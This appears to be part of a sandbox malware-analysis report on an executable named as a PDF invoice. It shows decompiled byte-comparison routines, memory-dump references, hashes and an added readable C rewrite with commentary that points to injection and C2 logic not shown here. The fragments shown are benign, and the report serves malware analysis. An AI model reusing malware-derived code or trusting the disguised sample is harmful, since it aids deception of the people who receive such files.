                                                  								}
                                                  								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                  								if(_t246 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								goto L51;
                                                  							}
                                                  							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                                  							if(_t319 == 0) {
                                                  								L40:
                                                  								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                                  								if(_t321 == 0) {
                                                  									L42:
                                                  									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                                  									if(_t323 == 0) {
                                                  										L44:
                                                  										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                                  										if(_t246 != 0) {
                                                  											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                  										}
                                                  										goto L47;
                                                  									}
                                                  									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                                  									if(_t246 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									goto L44;
                                                  								}
                                                  								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                  								if(_t246 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								goto L42;
                                                  							}
                                                  							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                  							if(_t246 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L40;
                                                  						}
                                                  						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                                  						if(_t325 == 0) {
                                                  							L29:
                                                  							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                                  							if(_t327 == 0) {
                                                  								L31:
                                                  								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                                  								if(_t329 == 0) {
                                                  									L33:
                                                  									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                                  									if(_t246 != 0) {
                                                  										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                  									}
                                                  									goto L36;
                                                  								}
                                                  								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                                  								if(_t246 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								goto L33;
                                                  							}
                                                  							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                                  							if(_t246 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L31;
                                                  						}
                                                  						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                                  						if(_t246 != 0) {
                                                  							goto L1;
                                                  						}
                                                  						goto L29;
                                                  					}
                                                  					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                                  					if(_t331 == 0) {
                                                  						L18:
                                                  						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                                  						if(_t333 == 0) {
                                                  							L20:
                                                  							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                                  							if(_t335 == 0) {
                                                  								L22:
                                                  								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                                  								if(_t246 != 0) {
                                                  									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                  								}
                                                  								goto L25;
                                                  							}
                                                  							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                                  							if(_t246 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                                  						if(_t246 != 0) {
                                                  							goto L1;
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                                  					if(_t246 != 0) {
                                                  						goto L1;
                                                  					}
                                                  					goto L18;
                                                  				} else {
                                                  					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                                  					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                                  					if(__edi == 0) {
                                                  						L7:
                                                  						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                                  						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                  						if(__edi == 0) {
                                                  							L9:
                                                  							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                  							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                  							if(__edi == 0) {
                                                  								L11:
                                                  								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                                  								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                  								if(__ecx != 0) {
                                                  									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                  								}
                                                  								goto L14;
                                                  							}
                                                   							__ecx = (0 | __edi > 0x00000000) * 2 - 1;
                                                   							if(__ecx != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L11;
                                                  						}
                                                   						__ecx = (0 | __edi > 0x00000000) * 2 - 1;
                                                   						if(__ecx != 0) {
                                                  							goto L1;
                                                  						}
                                                  						goto L9;
                                                  					}
                                                   					__ecx = (0 | __edi > 0x00000000) * 2 - 1;
                                                   					if(__ecx != 0) {
                                                  						goto L1;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L1:
                                                  				_t197 = _t246;
                                                  				return _t197;
                                                  			}
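The decompiled routine above is an unrolled byte-by-byte compare: stepping from offset -0x1f up to -1, each step subtracts (*(q - k) & 0xff) from (*(p - k) & 0xff), and the first non-zero difference is collapsed to -1 or 1 by the (0 | d > 0) * 2 - 1 idiom before the jump to L1, which returns it. The C below is an added, readable equivalent written for this report; it is not code recovered from INVOICE_90990_PDF.exe. The pointer names p and q, the helper names, and the block length (32 bytes, since only offsets -0x1f through -1 are visible in the fragment) are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Added example for this report, not code recovered from the sample: a
 * readable equivalent of the unrolled byte compare in the decompiled
 * fragment above.  Names (p, q, n, the helpers) are assumptions. */

/* The decompiler's "(0 | d > 0) * 2 - 1" idiom: collapse a non-zero byte
 * difference to 1 (p's byte larger) or -1 (q's byte larger). */
static int sign_of_diff(int d)
{
    if (d == 0)
        return 0;
    return (0 | (d > 0)) * 2 - 1;
}

/* Compare the n bytes that end just before p and q, i.e. p[-n]..p[-1]
 * against q[-n]..q[-1], lowest offset first (the fragment walks -0x1f up
 * to -1), and stop at the first mismatch.  Each step is the movzx + sub
 * pair rendered as "(*(p - k) & 0xff) - (*(q - k) & 0xff)". */
int cmp_block_tail(const unsigned char *p, const unsigned char *q, int n)
{
    int off;
    for (off = -n; off < 0; off++) {
        int d = (int)p[off] - (int)q[off];
        if (d != 0)
            return sign_of_diff(d);   /* the "goto L1" path: return +/-1 */
    }
    return 0;                          /* all n bytes equal */
}

/* Same compare for two 32-byte buffers addressed by their start; 32 is an
 * assumption, since only offsets -0x1f..-1 are visible in the fragment. */
int cmp32(const unsigned char *a, const unsigned char *b)
{
    return cmp_block_tail(a + 32, b + 32, 32);
}

/* Constructed test input: two buffers of 'A', with byte idx set to xv in
 * the first and yv in the second; returns the comparison result. */
int demo_case(int idx, unsigned char xv, unsigned char yv)
{
    unsigned char x[32], y[32];
    memset(x, 'A', sizeof x);
    memset(y, 'A', sizeof y);
    x[idx] = xv;
    y[idx] = yv;
    return cmp32(x, y);
}

int main(void)
{
    printf("equal        -> %d\n", demo_case(29, 'A', 'A'));
    printf("x[29] larger -> %d\n", demo_case(29, 'A', '@'));
    printf("y[29] larger -> %d\n", demo_case(29, 'A', 'B'));
    return 0;
}
```

The contract is the memcmp one (sign of the first differing byte, bytes treated as unsigned, later bytes ignored once a mismatch is found). A routine of this shape is usually a compiler-unrolled comparison loop; on its own it is not an indicator of anything, and is worth recognising mainly so that analysis time goes to the injection and C2 logic flagged in the signatures rather than to this block.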
                                                   [Instruction address column of the disassembly view for the routine above, detached from its code lines during extraction; the addresses run from 0x004041c6 to 0x00404a80, with 0x00000000 entries carrying no address.]
                                                  0x00404737
                                                  0x0040471e
                                                  0x00404727
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404727
                                                  0x004046fc
                                                  0x00404705
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404705
                                                  0x004046da
                                                  0x004046e3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404630
                                                  0x00404634
                                                  0x00404638
                                                  0x0040463a
                                                  0x00404652
                                                  0x00404652
                                                  0x0040465a
                                                  0x0040465c
                                                  0x00404674
                                                  0x00404674
                                                  0x0040467c
                                                  0x0040467e
                                                  0x00404696
                                                  0x00404696
                                                  0x0040469e
                                                  0x004046a0
                                                  0x004046a9
                                                  0x004046a9
                                                  0x00000000
                                                  0x004046a0
                                                  0x00404684
                                                  0x00404687
                                                  0x00404690
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404690
                                                  0x00404662
                                                  0x00404665
                                                  0x0040466e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040466e
                                                  0x00404640
                                                  0x00404643
                                                  0x0040464c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040464c
                                                  0x00403db2
                                                  0x00403db2
                                                  0x00404ba3

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: 10bafbf83d49dcea2401119f80e89eb287b2c147e64a16d744a45eca8541c1f4
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: A2C1837320509349DF6D4639843417FBAA56EE27B231A0BBED4F2DB2C4EE38C668D514
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			/* Compares the 0x1d (29) bytes preceding __esi with the 29 bytes preceding __edx,
                                                  			   four bytes per block, and returns -1, 0 or 1 like a fixed-length memcmp. */
                                                  			signed int E00403DBA(void* __edx, void* __esi) {
                                                  				signed int _t184;
                                                  				signed char _t185;
                                                  				signed char _t186;
                                                  				signed char _t187;
                                                  				signed char _t188;
                                                  				signed char _t190;
                                                  				signed int _t231;
                                                  				void* _t275;
                                                  				void* _t278;
                                                  				void* _t280;
                                                  				void* _t282;
                                                  				void* _t284;
                                                  				void* _t286;
                                                  				void* _t288;
                                                  				void* _t290;
                                                  				void* _t292;
                                                  				void* _t294;
                                                  				void* _t296;
                                                  				void* _t298;
                                                  				void* _t300;
                                                  				void* _t302;
                                                  				void* _t304;
                                                  				void* _t306;
                                                  				void* _t308;
                                                  				void* _t310;
                                                  				void* _t312;
                                                  				void* _t313;
                                                  
                                                  				_t313 = __esi;
                                                  				_t275 = __edx;
                                                  				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                                  					_t231 = 0;
                                                  					L11:
                                                  					if(_t231 != 0) {
                                                  						goto L1;
                                                  					}
                                                  					_t185 =  *(_t313 - 0x19);
                                                  					if(_t185 ==  *(_t275 - 0x19)) {
                                                  						_t231 = 0;
                                                  						L22:
                                                  						if(_t231 != 0) {
                                                  							goto L1;
                                                  						}
                                                  						_t186 =  *(_t313 - 0x15);
                                                  						if(_t186 ==  *(_t275 - 0x15)) {
                                                  							_t231 = 0;
                                                  							L33:
                                                  							if(_t231 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							_t187 =  *(_t313 - 0x11);
                                                  							if(_t187 ==  *(_t275 - 0x11)) {
                                                  								_t231 = 0;
                                                  								L44:
                                                  								if(_t231 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								_t188 =  *(_t313 - 0xd);
                                                  								if(_t188 ==  *(_t275 - 0xd)) {
                                                  									_t231 = 0;
                                                  									L55:
                                                  									if(_t231 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                                  										_t231 = 0;
                                                  										L66:
                                                  										if(_t231 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										_t190 =  *(_t313 - 5);
                                                  										if(_t190 ==  *(_t275 - 5)) {
                                                  											_t231 = 0;
                                                  											L77:
                                                  											if(_t231 == 0) {
                                                  												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                                  												if(_t231 != 0) {
                                                  													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                  												}
                                                  											}
                                                  											goto L1;
                                                  										}
                                                  										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                                  										if(_t278 == 0) {
                                                  											L70:
                                                  											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                                  											if(_t280 == 0) {
                                                  												L72:
                                                  												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                                  												if(_t282 == 0) {
                                                  													L74:
                                                  													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                                  													if(_t231 != 0) {
                                                  														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                  													}
                                                  													goto L77;
                                                  												}
                                                  												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                                  												if(_t231 != 0) {
                                                  													goto L1;
                                                  												}
                                                  												goto L74;
                                                  											}
                                                  											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                                  											if(_t231 != 0) {
                                                  												goto L1;
                                                  											}
                                                  											goto L72;
                                                  										}
                                                  										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                                  										if(_t231 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										goto L70;
                                                  									}
                                                  									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                                  									if(_t284 == 0) {
                                                  										L59:
                                                  										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                                  										if(_t286 == 0) {
                                                  											L61:
                                                  											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                                  											if(_t288 == 0) {
                                                  												L63:
                                                  												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                                  												if(_t231 != 0) {
                                                  													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                  												}
                                                  												goto L66;
                                                  											}
                                                  											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                                  											if(_t231 != 0) {
                                                  												goto L1;
                                                  											}
                                                  											goto L63;
                                                  										}
                                                  										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                                  										if(_t231 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										goto L61;
                                                  									}
                                                  									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                                  									if(_t231 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									goto L59;
                                                  								}
                                                  								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                                  								if(_t290 == 0) {
                                                  									L48:
                                                  									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                                  									if(_t292 == 0) {
                                                  										L50:
                                                  										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                                  										if(_t294 == 0) {
                                                  											L52:
                                                  											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                                  											if(_t231 != 0) {
                                                  												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                  											}
                                                  											goto L55;
                                                  										}
                                                  										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                  										if(_t231 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										goto L52;
                                                  									}
                                                  									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                  									if(_t231 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									goto L50;
                                                  								}
                                                  								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                                  								if(_t231 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								goto L48;
                                                  							}
                                                  							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                                  							if(_t296 == 0) {
                                                  								L37:
                                                  								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                                  								if(_t298 == 0) {
                                                  									L39:
                                                  									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                                  									if(_t300 == 0) {
                                                  										L41:
                                                  										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                                  										if(_t231 != 0) {
                                                  											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                  										}
                                                  										goto L44;
                                                  									}
                                                  									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                  									if(_t231 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									goto L41;
                                                  								}
                                                  								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                  								if(_t231 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								goto L39;
                                                  							}
                                                  							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                  							if(_t231 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L37;
                                                  						}
                                                  						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                                  						if(_t302 == 0) {
                                                  							L26:
                                                  							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                                  							if(_t304 == 0) {
                                                  								L28:
                                                  								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                                  								if(_t306 == 0) {
                                                  									L30:
                                                  									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                                  									if(_t231 != 0) {
                                                  										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                  									}
                                                  									goto L33;
                                                  								}
                                                  								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                  								if(_t231 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								goto L30;
                                                  							}
                                                  							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                  							if(_t231 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L28;
                                                  						}
                                                  						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                  						if(_t231 != 0) {
                                                  							goto L1;
                                                  						}
                                                  						goto L26;
                                                  					}
                                                  					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                                  					if(_t308 == 0) {
                                                  						L15:
                                                  						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                                  						if(_t310 == 0) {
                                                  							L17:
                                                  							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                                  							if(_t312 == 0) {
                                                  								L19:
                                                  								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                                  								if(_t231 != 0) {
                                                  									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                  								}
                                                  								goto L22;
                                                  							}
                                                  							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                  							if(_t231 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L19;
                                                  						}
                                                  						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                  						if(_t231 != 0) {
                                                  							goto L1;
                                                  						}
                                                  						goto L17;
                                                  					}
                                                  					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                  					if(_t231 != 0) {
                                                  						goto L1;
                                                  					}
                                                  					goto L15;
                                                  				} else {
                                                  					/* __al holds the byte loaded from *(__esi - 0x1d) for the comparison above */
                                                  					__edi = __al & 0x000000ff;
                                                  					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                  					if(__edi == 0) {
                                                  						L4:
                                                  						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                  						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                  						if(__edi == 0) {
                                                  							L6:
                                                  							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                                  							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                  							if(__edi == 0) {
                                                  								L8:
                                                  								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                                  								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                                  								if(__ecx != 0) {
                                                  									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                  								}
                                                  								goto L11;
                                                  							}
                                                  							__ecx = (0 | __edi > 0x00000000) * 2 - 1;
                                                  							if(__ecx != 0) {
                                                  								goto L1;
                                                  							}
                                                  							goto L8;
                                                  						}
                                                  						__ecx = (0 | __edi > 0x00000000) * 2 - 1;
                                                  						if(__ecx != 0) {
                                                  							goto L1;
                                                  						}
                                                  						goto L6;
                                                  					}
                                                  					__ecx = (0 | __edi > 0x00000000) * 2 - 1;
                                                  					if(__ecx != 0) {
                                                  						goto L1;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  				L1:
                                                  				_t184 = _t231;
                                                  				return _t184;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction ID: 83a3bd090a1eda59668e791c2c9f7397b61b011db2ce7de0cd7ccd78dbecc434
                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction Fuzzy Hash: 38C1917320509349DF6D4A39843417FBEB56EA17B231A07BED4B2DB2C4EE38C6689514
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004039A2(void* __edx, void* __esi) {
                                                  				signed char _t177;
                                                  				void* _t178;
                                                  				signed char _t179;
                                                  				signed char _t180;
                                                  				signed char _t181;
                                                  				signed char _t183;
                                                  				signed char _t184;
                                                  				void* _t228;
                                                  				void* _t278;
                                                  				void* _t281;
                                                  				void* _t283;
                                                  				void* _t285;
                                                  				void* _t287;
                                                  				void* _t289;
                                                  				void* _t291;
                                                  				void* _t293;
                                                  				void* _t295;
                                                  				void* _t297;
                                                  				void* _t299;
                                                  				void* _t301;
                                                  				void* _t303;
                                                  				void* _t305;
                                                  				void* _t307;
                                                  				void* _t309;
                                                  				void* _t311;
                                                  				void* _t313;
                                                  				void* _t315;
                                                  				void* _t317;
                                                  				void* _t319;
                                                  				void* _t321;
                                                  				void* _t322;
                                                  
                                                  				_t322 = __esi;
                                                  				_t278 = __edx;
                                                  				_t177 =  *(__esi - 0x1c);
                                                  				if(_t177 ==  *(__edx - 0x1c)) {
                                                  					_t228 = 0;
                                                  					L10:
                                                  					if(_t228 != 0) {
                                                  						L78:
                                                  						_t178 = _t228;
                                                  						return _t178;
                                                  					}
                                                  					_t179 =  *(_t322 - 0x18);
                                                  					if(_t179 ==  *(_t278 - 0x18)) {
                                                  						_t228 = 0;
                                                  						L21:
                                                  						if(_t228 != 0) {
                                                  							goto L78;
                                                  						}
                                                  						_t180 =  *(_t322 - 0x14);
                                                  						if(_t180 ==  *(_t278 - 0x14)) {
                                                  							_t228 = 0;
                                                  							L32:
                                                  							if(_t228 != 0) {
                                                  								goto L78;
                                                  							}
                                                  							_t181 =  *(_t322 - 0x10);
                                                  							if(_t181 ==  *(_t278 - 0x10)) {
                                                  								_t228 = 0;
                                                  								L43:
                                                  								if(_t228 != 0) {
                                                  									goto L78;
                                                  								}
                                                  								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                                                  									_t228 = 0;
                                                  									L54:
                                                  									if(_t228 != 0) {
                                                  										goto L78;
                                                  									}
                                                  									_t183 =  *(_t322 - 8);
                                                  									if(_t183 ==  *(_t278 - 8)) {
                                                  										_t228 = 0;
                                                  										L65:
                                                  										if(_t228 != 0) {
                                                  											goto L78;
                                                  										}
                                                  										_t184 =  *(_t322 - 4);
                                                  										if(_t184 ==  *(_t278 - 4)) {
                                                  											_t228 = 0;
                                                  											L76:
                                                  											if(_t228 == 0) {
                                                  												_t228 = 0;
                                                  											}
                                                  											goto L78;
                                                  										}
                                                  										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                                                  										if(_t281 == 0) {
                                                  											L69:
                                                  											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                                                  											if(_t283 == 0) {
                                                  												L71:
                                                  												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                                                  												if(_t285 == 0) {
                                                  													L73:
                                                  													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                                                  													if(_t228 != 0) {
                                                  														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                  													}
                                                  													goto L76;
                                                  												}
                                                  												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                                                  												if(_t228 != 0) {
                                                  													goto L78;
                                                  												}
                                                  												goto L73;
                                                  											}
                                                  											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                                                  											if(_t228 != 0) {
                                                  												goto L78;
                                                  											}
                                                  											goto L71;
                                                  										}
                                                  										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                                                  										if(_t228 != 0) {
                                                  											goto L78;
                                                  										}
                                                  										goto L69;
                                                  									}
                                                  									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                                                  									if(_t287 == 0) {
                                                  										L58:
                                                  										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                                                  										if(_t289 == 0) {
                                                  											L60:
                                                  											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                                                  											if(_t291 == 0) {
                                                  												L62:
                                                  												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                                                  												if(_t228 != 0) {
                                                  													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                  												}
                                                  												goto L65;
                                                  											}
                                                  											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                                                  											if(_t228 != 0) {
                                                  												goto L78;
                                                  											}
                                                  											goto L62;
                                                  										}
                                                  										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                                                  										if(_t228 != 0) {
                                                  											goto L78;
                                                  										}
                                                  										goto L60;
                                                  									}
                                                  									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                                                  									if(_t228 != 0) {
                                                  										goto L78;
                                                  									}
                                                  									goto L58;
                                                  								}
                                                  								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                                                  								if(_t293 == 0) {
                                                  									L47:
                                                  									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                                                  									if(_t295 == 0) {
                                                  										L49:
                                                  										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                                                  										if(_t297 == 0) {
                                                  											L51:
                                                  											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                                                  											if(_t228 != 0) {
                                                  												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                  											}
                                                  											goto L54;
                                                  										}
                                                  										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                  										if(_t228 != 0) {
                                                  											goto L78;
                                                  										}
                                                  										goto L51;
                                                  									}
                                                  									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                                                  									if(_t228 != 0) {
                                                  										goto L78;
                                                  									}
                                                  									goto L49;
